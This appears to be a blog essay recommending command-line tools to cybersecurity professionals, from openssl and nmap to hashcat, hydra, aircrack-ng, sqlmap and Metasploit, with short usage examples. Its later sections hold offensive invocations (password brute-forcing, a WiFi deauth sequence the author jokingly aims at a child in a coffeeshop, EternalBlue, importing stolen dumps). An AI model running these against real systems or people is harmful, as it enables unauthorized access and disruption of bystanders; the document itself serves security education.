This is your general cryptography toolkit, doing everything from simple encryption, to public-key certificate signing, to establishing SSL connections.

It is extraordinarily user hostile, with terrible inconsistency among options. You can only figure out how to do things by looking up examples on the net, such as on StackExchange. There are competing SSL libraries with their own command-line tools, like GnuTLS and Mozilla NSS that you might find easier to use.

The fundamental use of the ‘openssl’ tool is to create public-keys, “certificate requests”, and self-signed certificates. All the web-site certificates I’ve ever obtained have been created using the openssl command-line tool to create CSRs.

You should practice using the ‘openssl’ tool to encrypt files, sign files, and to check signatures.

You can use openssl just like PGP for encrypted emails/messages, but following the “S/MIME” standard rather than PGP standard. You might consider learning the ‘pgp’ command-line tools, or the open-source ‘gpg’ or ‘gpg2’ tools as well.

You should learn how to use the “openssl s_client” feature to establish SSL connections, as well as the “openssl s_server” feature to create an SSL proxy for a server that doesn’t otherwise support SSL.

Learning all the ways of using the ‘openssl’ tool to do useful things will go a long way in teaching somebody about crypto and cybersecurity. I can imagine an entire class consisting of nothing but learning ‘openssl’.

netcat (nc, socat, cryptocat, ncat)

A lot of Internet protocols are based on text. That means you can create a raw TCP connection to the service and interact with them using your keyboard. The classic tool for doing this is known as “netcat”, abbreviated “nc”. For example, connect to Google’s web server at port 80 and type the HTTP HEAD command followed by a blank line (hit [return] twice):
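The session might look like this (the blank line after the HEAD request is what triggers the response):

$ nc www.google.com 80
HEAD / HTTP/1.0
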

Another classic example is to connect to port 25 on a mail server to send email, spoofing the “MAIL FROM” address.

There are several versions of ‘netcat’ that work over SSL as well. My favorite is ‘ncat’, which comes with ‘nmap’, as it’s actively maintained. In theory, “openssl s_client” should also work this way.

nmap

At some point, you’ll need to port scan. The standard program for this is ‘nmap’, and it’s the best. The classic way of using it is something like:

# nmap -A scanme.nmap.org

The ‘-A’ option means to enable all the interesting features like OS detection, version detection, and basic scripts on the most common ports that a server might have open. It takes a while to run. The “scanme.nmap.org” is a good site to practice on.

Nmap is more than just a port scanner. It has a rich scripting system for probing more deeply into a system than just a port, and to gather more information useful for attacks. The scripting system essentially contains some attacks, such as password guessing.

Scanning the Internet, finding services identified by ‘nmap’ scripts, and interacting with them with tools like ‘ncat’ will teach you a lot about how the Internet works.

BTW, if ‘nmap’ is too slow, use ‘masscan’ instead. It’s a lot faster, though has much more limited functionality.

Packet sniffing with tcpdump and tshark

All Internet traffic consists of packets going between IP addresses. You can capture those packets and view them using “packet sniffers”. The most important packet-sniffer is “Wireshark”, a GUI. For the command-line, there is ‘tcpdump’ and ‘tshark’.

You can run tcpdump on the command-line to watch packets go in/out of the local computer. This performs a quick “decode” of packets as they are captured. It’ll reverse-lookup IP addresses into DNS names, which means its buffers can overflow, dropping new packets while it’s waiting for DNS name responses for previous packets (which can be disabled with -n):

# tcpdump -p -i eth0

A common task is to create a round-robin set of files, saving the last 100 files of 1-gig each. Older files are overwritten. Thus, when an attack happens, you can stop capture, go backward in time, and view the contents of the network traffic using something like Wireshark:

# tcpdump -p -i eth0 -s65535 -C 1000 -W 100 -w cap

Instead of capturing everything, you’ll often set “BPF” filters to narrow down to traffic from a specific target, or a specific port.

The above examples use the -p option to capture traffic destined to the local computer. Sometimes you may want to look at all traffic going to other machines on the local network. You’ll need to figure out how to tap into wires, or setup “monitor” ports on switches for this to work.

A more advanced command-line program is ‘tshark’. It can apply much more complex filters. It can also be used to extract the values of specific fields and dump them to a text file.

Base64/hexdump/xxd/od

These are some rather trivial commands, but you should know them.

The ‘base64’ command encodes binary data in text. The text can then be passed around, such as in email messages. Base64 encoding is often automatic in the output from programs like openssl and PGP.

In many cases, you’ll need to view a hex dump of some binary data. There are many programs to do this, such as hexdump, xxd, od, and more.

grep

Grep searches for a pattern within a file. More important, it searches for a regular expression (regex) in a file. The fu of Unix is that a lot of stuff is stored in text files, and you use grep with regex patterns in order to extract stuff stored in those files.

The power of this tool really depends on your mastery of regexes. You should master enough that you can understand StackExchange posts that explain almost what you want to do, and then tweak them to make them work.

Grep, by default, shows only the matching lines. In many cases, you only want the part that matches. To do that, use the -o option. (This is not available on all versions of grep).

You’ll probably want the better, “extended” regular expressions, so use the -E option.

You’ll often want “case-insensitive” options (matching both upper and lower case), so use the -i option.

For example, to extract all MAC address from a text file, you might do something like the following. This extracts all strings that are twelve hex digits.

$ grep -Eio '[0-9A-F]{12}' foo.txt

Text processing

Grep is just the first of the various “text processing filters”. Other useful ones include ‘sed’, ‘cut’, ‘sort’, and ‘uniq’.

You’ll be an expert at piping the output of one to the input of the next. You’ll use “sort | uniq” as god (Dennis Ritchie) intended and not the heresy of “sort -u”.

You might want to master ‘awk’. It’s a new programming language, but once you master it, it’ll be easier than other mechanisms.

You’ll end up using ‘wc’ (word-count) a lot. All it does is count the number of lines, words, characters in a file, but you’ll find yourself wanting to do this a lot.

csvkit and jq

You get data in CSV format and JSON format a lot. The tools ‘csvkit’ and ‘jq’ respectively help you deal with those formats, converting these files into other formats, sticking the data in databases, and so forth.

It’ll be easier using these tools that understand these text formats to extract data than trying to write ‘awk’ commands or ‘grep’ regexes.

strings

Most files are binary with a few readable ASCII strings. You use the program ‘strings’ to extract those strings.

This one simple trick sounds stupid, but it’s more powerful than you’d think. For example, I knew that a program probably contained a hard-coded password. I then blindly grabbed all the strings in the program’s binary file and sent them to a password cracker to see if they could decrypt something. And indeed, one of the 100,000 strings in the file worked, thus finding the hard-coded password.

tail -f

So 'tail' is just a standard Linux tool for looking at the end of files. If you want to keep checking the end of a live file that's constantly growing, then use "tail -f". It'll sit there waiting for something new to be added to the end of the file, then print it out. I do this a lot, so I thought it'd be worth mentioning.
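
For example, something like this (the log path is the Debian/Ubuntu one; other distros differ) watches a log live and shows only the lines you care about:

$ tail -f /var/log/auth.log | grep --line-buffered sshd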

tar -xvzf, gzip, xz, 7z

In prehistorical times (like the 1980s), Unix was backed up to tape drives. The tar command could be used to combine a bunch of files into a single “archive” to be sent to the tape drive, hence “tape archive” or “tar”.

These days, a lot of stuff you download will be in tar format (ending in .tar). You’ll need to learn how to extract it:

$ tar -xvf something.tar

Nobody knows what the "xvf" options mean anymore, but these letters must be specified in that order. I'm joking here, but only a little: somebody did a survey once and found that virtually nobody knows how to use 'tar' other than via canned formulas such as this.

Along with combining files into an archive, you also need to compress them. In prehistoric Unix, the "compress" command would be used, which would replace a file with a compressed version ending in '.Z'. This was found to be encumbered by patents, so everyone switched to 'gzip' instead, which replaces a file with a new one ending in '.gz'.

$ ls foo.txt*
foo.txt
$ gzip foo.txt
$ ls foo.txt*
foo.txt.gz

Combined with tar, you get files with either the “.tar.gz” extension, or simply “.tgz”. You can untar and uncompress at the same time:

$ tar -xvzf something.tar.gz

Gzip is always good enough, but nerds gonna nerd and want to compress with slightly better compression programs. They’ll have extensions like “.bz2”, “.7z”, “.xz”, and so on. There are a ton of them. Some of them are supported directly by the ‘tar’ program:

$ tar -xvjf something.tar.bz2

Then there is the "zip/unzip" program, which supports the Windows .zip file format. To create compressed archives these days, I don't bother with tar, but just use the ZIP format. For example, this will recursively descend a directory, adding all files to a ZIP file that can easily be extracted under Windows:

$ zip -r test.zip ./test/

dd

I should include this under the system tools at the top, but it's interesting for a number of purposes. The usage is simply to copy one file to another, the in-file to the out-file.

$ dd if=foo.txt of=foo2.txt

But that's not interesting. What's interesting is using it to write to "devices". The disk drives in your system also exist as raw devices under the /dev directory.

For example, if you want to create a boot USB drive for your Raspberry Pi:
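
(A sketch; the image name and device path are placeholders for whatever your system shows, and dd will cheerfully overwrite the wrong disk if you get the device wrong.)

# dd if=raspbian.img of=/dev/sdb bs=4M status=progress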

Or, you might want to image a drive on the system, for later forensics, without stumbling on things like open files.

# dd if=/dev/sda of=/media/Lexar/infected.img

The ‘dd’ program has some additional options, like block size and so forth, that you’ll want to pay attention to.

screen and tmux

You log in remotely and start some long running tool. Unfortunately, if you log out, all the processes you started will be killed. If you want it to keep running, then you need a tool to do this.

I use ‘screen’. Before I start a long running port scan, I run the “screen” command. Then, I type [ctrl-a][ctrl-d] to disconnect from that screen, leaving it running in the background.

Then later, I type "screen -r" to reconnect to it. If there is more than one screen session, using '-r' by itself will list them all. Use "-r pid" to reattach to the proper one. If you can't, then use "-D pid" or "-D -RR pid" to force the other session to detach from whoever is using it.

Tmux is an alternative to screen that many use. It's also cool for having lots of terminal screens open at once.

curl and wget

Sometimes you want to download files from websites without opening a browser. The 'curl' and 'wget' programs do that easily. Wget is the traditional way of doing this, but curl is a bit more flexible. I use curl for everything these days, except mirroring a website, in which case I just do "wget -m website".

The thing that makes 'curl' so powerful is that it's really designed as a tool for poking and prodding at all the various features of HTTP. That it's also useful for downloading files is a happy coincidence. When playing with a target website, curl will allow you to do lots of complex things, which you can then script via bash. For example, hackers often write their cross-site scripting/forgery attacks as bash scripts using curl.
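
For example, a rough sketch of poking at a login form with curl, keeping cookies between requests (the URL, form fields, and file names are all made up):

$ curl -s -c cookies.txt -d 'user=admin&pass=password123' https://example.com/login
$ curl -s -b cookies.txt https://example.com/admin -o admin-page.html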

node/php/python/perl/ruby/lua

As mentioned above, bash is its own programming language. But it’s weird, and annoying. So sometimes you want a real programming language. Here are some useful ones.

Yes, PHP is a language that runs in a web server for creating web pages. But if you know the language well, it’s also a fine command-line language for doing stuff.

Yes, JavaScript is a language that runs in the web browser. But if you know it well, it’s also a great language for doing stuff, especially with the “nodejs” version.

Then there are other good command-line languages, like Python, Ruby, Lua, and the venerable Perl.

What makes all these great is the large library support. Somebody has already written a library that nearly does what you want, and it can be made to work with a little bit of extra code of your own.

My general impression is that Python and NodeJS have the largest libraries likely to have what you want, but you should pick whichever language you like best, whichever makes you most productive. For me, that's NodeJS, because of the great Visual Studio Code IDE/debugger.

iptables, iptables-save

I shouldn’t include this in the list. Iptables isn’t a command-line tool as such. The tool is the built-in firewalling/NAT features within the Linux kernel. Iptables is just the command to configure it.

Firewalling is an important part of cybersecurity. Everyone should have some experience playing with a Linux system doing basic firewalling tasks: basic rules, NATting, and transparent proxying for mitm attacks.

Use 'iptables-save' to dump your rules to a file that can be restored at boot; otherwise your changes disappear when the system reboots.
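
A sketch of the basics (the interface name is an assumption, and where you save the rules file depends on your distro): default-deny inbound, allow established traffic and SSH, NAT outbound traffic, then save:

# iptables -P INPUT DROP
# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp --dport 22 -j ACCEPT
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# iptables-save > /etc/iptables/rules.v4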

MySQL

Similar to ‘iptables’, ‘mysql’ isn’t a tool in its own right, but a way of accessing a database maintained by another process on the system.

Filters acting on text files only go so far. Sometimes you need to dump the data into a database and make queries on that database.

There is also the offensive skill of learning how targets store things in a database, and how attackers get at the data.

Hackers often publish raw SQL data they've stolen in their hacks (like the Ashley Madison dump). Being able to stick those dumps into your own database is quite useful. Hint: disable transaction logging while importing mass data.
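
A rough sketch of that kind of bulk import in the mysql client (the dump filename is a placeholder; SET sql_log_bin needs privileges and only matters if binary logging is on):

mysql> SET autocommit=0;
mysql> SET unique_checks=0;
mysql> SET foreign_key_checks=0;
mysql> SET sql_log_bin=0;
mysql> SOURCE dump.sql;
mysql> COMMIT;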

If you don’t like SQL, you might consider NoSQL tools like Elasticsearch, MongoDB, and Redis that can similarly be useful for arranging and searching data. You’ll probably have to learn some JSON tools for formatting the data.

Reverse engineering tools

A cybersecurity specialty is “reverse engineering”. Some want to reverse engineer the target software being hacked, to understand vulnerabilities. This is needed for commercial software and device firmware where the source code is hidden. Others use these tools to analyze viruses/malware.

Qemu is a useful virtual machine. It can emulate full systems, such as an IoT device based on the MIPS processor. Like some other tools mentioned here, it's more a full subsystem than a simple command-line tool.

On a live system, you can use 'strace' to view what system calls a process is making. Use 'lsof' to view which files a process has open and which network connections it's making.
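
For example (the process ID and port number are placeholders):

$ strace -f -e trace=network -p 1234
$ lsof -nP -p 1234
$ lsof -nP -i :8080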

Password crackers

A common cybersecurity specialty is "password cracking". There are two kinds: online and offline password crackers.

Typical online password crackers are 'hydra' and 'medusa'. They can take files containing common passwords and attempt to log on to various protocols remotely, like HTTP, SMB, FTP, Telnet, and so on. I used 'hydra' recently to find the default/backdoor passwords of many IoT devices I've bought for my test lab.
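
A sketch of a typical hydra run (the username, wordlist, and target address are placeholders):

$ hydra -l admin -P passwords.txt -t 4 telnet://192.168.1.50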

Online password crackers must open TCP connections to the target, and try to logon. This limits their speed. They also may be stymied by systems that lock accounts, or introduce delays, after too many bad password attempts.

Typical offline password crackers are 'hashcat' and 'jtr' (John the Ripper). They work off of stolen password hashes. They can attempt billions of passwords per second, because there's no network interaction slowing them down.

Understanding offline password crackers means getting an appreciation for the exponential difficulty of the problem. A sufficiently long and complex encrypted password is uncrackable. Instead of brute-force attempts at all possible combinations, we must use tricks, like mutating the top million most common passwords.

I use hashcat because of the great GPU support, but John is also a great program.
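
For example, a sketch of a dictionary attack with rule-based mutations in hashcat (the hash file is a placeholder, rockyou.txt stands in for whatever wordlist you use, -m 1000 selects NTLM, and rules/best64.rule ships with hashcat):

$ hashcat -m 1000 -a 0 ntlm.hashes rockyou.txt -r rules/best64.rule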

WiFi hacking

A common specialty in cybersecurity is WiFi hacking. The difficulty in WiFi hacking is getting the right WiFi hardware that supports the features (monitor mode, packet injection), then the right drivers installed in your operating system. That’s why I use Kali rather than some generic Linux distribution, because it’s got the right drivers installed.

The 'aircrack-ng' suite is the best for doing basic hacking, such as packet injection. When the parents are letting the iPad babysit their kid with a loud movie at the otherwise quiet coffeeshop, use 'aircrack-ng' to deauth the kid.
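
A sketch of the usual sequence (the interface name and MAC addresses are placeholders): put the card in monitor mode, find the network, then send deauth frames:

# airmon-ng start wlan0
# airodump-ng wlan0mon
# aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon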

The 'reaver' tool is useful for hacking into access points that leave WPS wide open and misconfigured.

Some useful DNS tools are 'dig' (described above), plus dnsrecon/dnsenum/fierce, which try to enumerate and guess as many names as possible within a domain. These tools all have unique features, but also have a lot of overlap.
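
For instance (with example.com standing in for the real domain), 'dig' answers a specific question while 'dnsrecon' tries to enumerate everything it can:

$ dig +short example.com MX
$ dnsrecon -d example.com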

Nikto is a basic tool for probing for common vulnerabilities, out-of-date software, and so on. It's not really a vulnerability scanner like Nessus, which defenders use, but more of a tool for attackers.
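
Basic usage is just pointing it at a host (the URL is a placeholder):

$ nikto -h http://example.com/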

SQLmap is a popular tool for probing for SQL injection weaknesses.
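
For example, a sketch of testing a single parameter and listing databases (the URL is made up; --batch accepts the default answers to prompts):

$ sqlmap -u 'http://example.com/item.php?id=1' --dbs --batch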

Then there is 'msfconsole'. It has some attack features. That's humor: it has all the attack features. Metasploit is the most popular tool for running remote attacks against targets, exploiting vulnerabilities.
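
A sketch of the typical flow inside msfconsole (the module and target address are just examples):

msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.50
msf6 > run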

Text editor

Finally, there is the decision of text editor. I use 'vi' variants. Others like 'nano' and its variants. There's no wrong answer as to which editor to use, unless that answer is 'emacs'.

Conclusion

Obviously, not every cybersecurity professional will be familiar with every tool in this list. If you don’t do reverse-engineering, then you won’t use reverse-engineering tools.

On the other hand, regardless of your specialty, you need to know basic crypto concepts, so you should know something like the 'openssl' tool. You need to know basic networking, so you should know things like 'nmap' and 'tcpdump'. You need to be comfortable processing large dumps of data, manipulating it with any tool available. You shouldn't be frightened by a little sysadmin work.

The above list is therefore a useful starting point for cybersecurity professionals. Of course, those new to the industry won’t have much familiarity with them. But it’s fair to say that I’ve used everything listed above at least once in the last year, and the year before that, and the year before that. I spend a lot of time on StackExchange and Google searching the exact options I need, so I’m not an expert, but I am familiar with the basic use of all these things.
